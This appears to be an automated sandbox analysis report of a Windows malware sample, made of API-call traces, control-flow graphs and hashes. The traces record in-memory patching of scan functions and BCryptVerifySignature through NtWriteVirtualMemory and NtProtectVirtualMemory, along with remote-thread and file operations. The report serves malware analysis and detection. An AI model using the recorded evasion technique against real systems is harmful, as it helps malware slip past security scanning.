                                                                                                    • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008A0,00000000,000008A0,0419A44C,ScanBuffer,0419A3D0,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,000008A4,0021EFF8,0419A524), ref: 0412927F
                                                                                                      • Part of subcall function 0411FCD8: LoadLibraryW.KERNEL32(bcrypt,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,UacScan,0419A3D0,04129710,UacInitialize,0419A3D0,04129710,000008A0,0419A44C), ref: 0411FCEA
                                                                                                      • Part of subcall function 0411FCD8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0411FCF7
                                                                                                      • Part of subcall function 0411FCD8: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008A4,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,UacScan), ref: 0411FD0E
                                                                                                      • Part of subcall function 0411FCD8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,UacScan,0419A3D0,04129710,UacInitialize,0419A3D0), ref: 0411FD1D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryVirtual$LibraryWrite$AddressProcProcessThread$ContextCurrentFreeHandleLoadModule$AllocateCreateProtectReadResumeSectionUnmapUserView
                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
                                                                                                    • API String ID: 1232097254-1058128293
                                                                                                    • Opcode ID: 5b2604674437283d7ee6695346282ab9caa600a5e6a4c764129587733f1556a2
                                                                                                    • Instruction ID: 83236d3d6f1e7015aa3b83b38c01e10c173b1b2f947aec9acd5ec0a5761cc789
                                                                                                    • Opcode Fuzzy Hash: 5b2604674437283d7ee6695346282ab9caa600a5e6a4c764129587733f1556a2
                                                                                                    • Instruction Fuzzy Hash: 46D20B75B111289BEB11EB68DEC0BCE73B9AF45204F1085B5E208EB254DF70BE968F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 4960 4105ddc-4105e1d GetModuleFileNameA RegOpenKeyExA 4961 4105e5f-4105ea2 call 4105c18 RegQueryValueExA 4960->4961 4962 4105e1f-4105e3b RegOpenKeyExA 4960->4962 4967 4105ea4-4105ec0 RegQueryValueExA 4961->4967 4968 4105ec6-4105ee0 RegCloseKey 4961->4968 4962->4961 4963 4105e3d-4105e59 RegOpenKeyExA 4962->4963 4963->4961 4965 4105ee8-4105f19 lstrcpynA GetThreadLocale GetLocaleInfoA 4963->4965 4969 4106002-4106009 4965->4969 4970 4105f1f-4105f23 4965->4970 4967->4968 4971 4105ec2 4967->4971 4973 4105f25-4105f29 4970->4973 4974 4105f2f-4105f45 lstrlenA 4970->4974 4971->4968 4973->4969 4973->4974 4975 4105f48-4105f4b 4974->4975 4976 4105f57-4105f5f 4975->4976 4977 4105f4d-4105f55 4975->4977 4976->4969 4979 4105f65-4105f6a 4976->4979 4977->4976 4978 4105f47 4977->4978 4978->4975 4980 4105f94-4105f96 4979->4980 4981 4105f6c-4105f92 lstrcpynA LoadLibraryExA 4979->4981 4980->4969 4982 4105f98-4105f9c 4980->4982 4981->4980 4982->4969 4983 4105f9e-4105fce lstrcpynA LoadLibraryExA 4982->4983 4983->4969 4984 4105fd0-4106000 lstrcpynA LoadLibraryExA 4983->4984 4984->4969
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,04100000,0416A794), ref: 04105DF8
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,04100000,0416A794), ref: 04105E16
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,04100000,0416A794), ref: 04105E34
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 04105E52
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,04105EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 04105E9B
                                                                                                    • RegQueryValueExA.ADVAPI32(?,04106048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,04105EE1,?,80000001), ref: 04105EB9
                                                                                                    • RegCloseKey.ADVAPI32(?,04105EE8,00000000,?,?,00000000,04105EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04105EDB
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 04105EF8
                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 04105F05
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 04105F0B
                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 04105F36
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 04105F7D
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 04105F8D
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 04105FB5
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 04105FC5
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 04105FEB
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 04105FFB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                    • API String ID: 1759228003-2375825460
                                                                                                    • Opcode ID: 0455fcd24e2c3d721b522e2bc8f5ef475e19e923a32ca4eb1fcd2e4ee089198a
                                                                                                    • Instruction ID: 6362c597dc32e3221ef2763d48101d06e2a9dccf772ddda9eb18357ec269bd2f
                                                                                                    • Opcode Fuzzy Hash: 0455fcd24e2c3d721b522e2bc8f5ef475e19e923a32ca4eb1fcd2e4ee089198a
                                                                                                    • Instruction Fuzzy Hash: 75517875A4025C7EFB21D6A4CCC6FEF7BAD9B04744F5080A1A604E61C1D7F9BA548F50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD70
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD7E
                                                                                                    • GetProcAddress.KERNEL32(74AD0000,00000000), ref: 0411FD97
                                                                                                    • GetCurrentProcess.KERNEL32(0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB3
                                                                                                    • NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB9
                                                                                                    • GetCurrentProcess.KERNEL32(0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE3
                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE9
                                                                                                    • FreeLibrary.KERNEL32(74AD0000,00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000), ref: 0411FDF4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentLibraryMemoryProcessVirtual$AddressFreeHandleLoadModuleProcProtectWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 1488642996-0
                                                                                                    • Opcode ID: bf5f6291a6b88863f63cc6f771b7c7f1d0c1486223fecc91b572b90ce376ee08
                                                                                                    • Instruction ID: 09b0682434af37a4facab0476b1c46da4497b800a8c2ba90e4f56bbaade54235
                                                                                                    • Opcode Fuzzy Hash: bf5f6291a6b88863f63cc6f771b7c7f1d0c1486223fecc91b572b90ce376ee08
                                                                                                    • Instruction Fuzzy Hash: F2114F70600244ABEB00FBB9CEC2A5E77E8DF44658F548120F208E72D0CBB4BE658B18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 7174 411fcd8-411fcf3 LoadLibraryW 7175 411fd22-411fd2a 7174->7175 7176 411fcf5-411fcfe GetProcAddress 7174->7176 7177 411fd00-411fd18 NtWriteVirtualMemory 7176->7177 7178 411fd1c-411fd1d FreeLibrary 7176->7178 7177->7178 7179 411fd1a 7177->7179 7178->7175 7179->7178
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(bcrypt,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,UacScan,0419A3D0,04129710,UacInitialize,0419A3D0,04129710,000008A0,0419A44C), ref: 0411FCEA
                                                                                                    • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0411FCF7
                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008A4,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,UacScan), ref: 0411FD0E
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,UacScan,0419A3D0,04129710,UacInitialize,0419A3D0), ref: 0411FD1D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                    • String ID: BCryptVerifySignature$bcrypt
                                                                                                    • API String ID: 1002360270-4067648912
                                                                                                    • Opcode ID: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
                                                                                                    • Instruction ID: 96033809526fc8f444f7e99e1a9ec613efbf8d0283e7b8b95e6265c1dc852b54
                                                                                                    • Opcode Fuzzy Hash: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
                                                                                                    • Instruction Fuzzy Hash: BAF0E9712096146DF610A2245CC0EBF369CCBC1774F148739F5548A1C0D7A1AD0582B9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0411FB8D
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0411FB93
                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0411FBB3
                                                                                                    Strings
                                                                                                    • NtAllocateVirtualMemory, xrefs: 0411FB83
                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 0411FB88
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                    • API String ID: 421316089-2206134580
                                                                                                    • Opcode ID: 3ccc60afbcc6dfb6967a35f276ae12d7993465d769aef3e90d85a7a938b13a1c
                                                                                                    • Instruction ID: 3801104b255b35d445400da932c82c1594f67a7a93c3bdee8b9b330a617e5e8b
                                                                                                    • Opcode Fuzzy Hash: 3ccc60afbcc6dfb6967a35f276ae12d7993465d769aef3e90d85a7a938b13a1c
                                                                                                    • Instruction Fuzzy Hash: 17E075B6240248BBDB40DF99D985EDB37ECEB08650B408015BA18D7141DB74E9548B69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0411FB8D
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0411FB93
                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0411FBB3
                                                                                                    Strings
                                                                                                    • NtAllocateVirtualMemory, xrefs: 0411FB83
                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 0411FB88
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                    • API String ID: 421316089-2206134580
                                                                                                    • Opcode ID: f7bf3b1dc5239f7d37bf88128e9087be4a251f2c0e5d0ee95438e958c9c2c328
                                                                                                    • Instruction ID: 1a689abbf619d46a9927bb9e03e9b1495824c3f34ad5cbeac89282f260c8472d
                                                                                                    • Opcode Fuzzy Hash: f7bf3b1dc5239f7d37bf88128e9087be4a251f2c0e5d0ee95438e958c9c2c328
                                                                                                    • Instruction Fuzzy Hash: B0E075B6240248ABDB40DF99D985EDB37ECAB08650B408015BA18D7141DB74E9548B69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 04105228: SysAllocStringLen.OLEAUT32(?,?), ref: 04105236
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0415B838), ref: 0415B7A3
                                                                                                    • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0415B838), ref: 0415B7D3
                                                                                                    • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0415B7E8
                                                                                                    • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0415B814
                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0415B81D
                                                                                                      • Part of subcall function 04104F68: SysFreeString.OLEAUT32(0415C89C), ref: 04104F76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1897104825-0
                                                                                                    • Opcode ID: 62257a8e659e3b000c1edc7fcd5645a46073641cf92065a0aa25139f5b1e4c6b
                                                                                                    • Instruction ID: cb6ae6a16f5439dc3882a1c3043d1f4b941d87ed0e28037094b4cf8a9ce789f5
                                                                                                    • Opcode Fuzzy Hash: 62257a8e659e3b000c1edc7fcd5645a46073641cf92065a0aa25139f5b1e4c6b
                                                                                                    • Instruction Fuzzy Hash: A4212C71A80219BAEB10EAA4CDC2FDFB7ACEB08704F504461B610E71D0DBB4BA148B94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0415BC76
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CheckConnectionInternet
                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                    • Opcode ID: 72d016c10589a40286921bde3fb946e432b50da35df657baf54cab27db7a90a3
                                                                                                    • Instruction ID: 886a8fe4d4e901bd45c17386200fa936409aab3f9611a6e067e324a61ba1fde7
                                                                                                    • Opcode Fuzzy Hash: 72d016c10589a40286921bde3fb946e432b50da35df657baf54cab27db7a90a3
                                                                                                    • Instruction Fuzzy Hash: 19412E35B05108DBEB01EBA4D9C1EDEB3B9EF98204F618435E660B72A0DFB4BD058B54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 04105228: SysAllocStringLen.OLEAUT32(?,?), ref: 04105236
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0415B756), ref: 0415B6C3
                                                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0415B6FD
                                                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0415B72A
                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0415B733
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3764614163-0
                                                                                                    • Opcode ID: 2126ae12a6544d50e86e3173223823774f6172fed8ad9ad395ca72af591dfd9e
                                                                                                    • Instruction ID: 6c43658a83729faa3eee22e8eec11e326440321b2d3da927eac038a8e603fb70
                                                                                                    • Opcode Fuzzy Hash: 2126ae12a6544d50e86e3173223823774f6172fed8ad9ad395ca72af591dfd9e
                                                                                                    • Instruction Fuzzy Hash: 2821EC71A41209BAEB20EAA4CDC2FDEB7BC9B04B04F614561B610F71D0D7B0BB048B55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 04105228: SysAllocStringLen.OLEAUT32(?,?), ref: 04105236
                                                                                                    • RtlInitUnicodeString.N(?,?,00000000,0415B676), ref: 0415B624
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0415B676), ref: 0415B63A
                                                                                                    • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0415B676), ref: 0415B659
                                                                                                      • Part of subcall function 04104F68: SysFreeString.OLEAUT32(0415C89C), ref: 04104F76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                    • String ID:
                                                                                                    • API String ID: 1694942484-0
                                                                                                    • Opcode ID: e1fad5d756584cdc148c06c386c17c77b131ab5c244f971bdd4d8127c3da80ed
                                                                                                    • Instruction ID: 25c9e5569df4825d8fe6e3fe56fddf461cdc83a68ec801d0fbbd4b1c09f05201
                                                                                                    • Opcode Fuzzy Hash: e1fad5d756584cdc148c06c386c17c77b131ab5c244f971bdd4d8127c3da80ed
                                                                                                    • Instruction Fuzzy Hash: 95014F71914208FAEB11EBA0CCC2FCEB3BCEB48704F504561AA10E2590EB74BB04CB64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0411EF38: CLSIDFromProgID.OLE32(00000000,?,00000000,0411EF85,?,?,?,00000000), ref: 0411EF65
                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,0411F078,00000000,00000000,0411EFF7,?,00000000,0411F067), ref: 0411EFE3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFromInstanceProg
                                                                                                    • String ID:
                                                                                                    • API String ID: 2151042543-0
                                                                                                    • Opcode ID: 329724137eb9e957bb4e5c804ff8fd249fdb17ac142360fa146ba76207cda658
                                                                                                    • Instruction ID: 8a57c16a71d20dc87aba4952d925b38fd42a7a0a316ac6651a9c802b5b7c0c9d
                                                                                                    • Opcode Fuzzy Hash: 329724137eb9e957bb4e5c804ff8fd249fdb17ac142360fa146ba76207cda658
                                                                                                    • Instruction Fuzzy Hash: BC01A7716087056FE715DFA09C9286EB7ACD749710FA24475FD00D26A0EB747D10C965
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(00000000,0416967E), ref: 04169612
                                                                                                      • Part of subcall function 04147420: GetCurrentProcessId.KERNEL32(?,00000000,04147598), ref: 04147441
                                                                                                      • Part of subcall function 04147420: GlobalAddAtomA.KERNEL32(00000000), ref: 04147474
                                                                                                      • Part of subcall function 04147420: GetCurrentThreadId.KERNEL32 ref: 0414748F
                                                                                                      • Part of subcall function 04147420: GlobalAddAtomA.KERNEL32(00000000), ref: 041474C5
                                                                                                      • Part of subcall function 04147420: RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,04147598), ref: 041474DB
                                                                                                      • Part of subcall function 04147420: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,04147598), ref: 0414755F
                                                                                                      • Part of subcall function 04147420: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 04147570
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
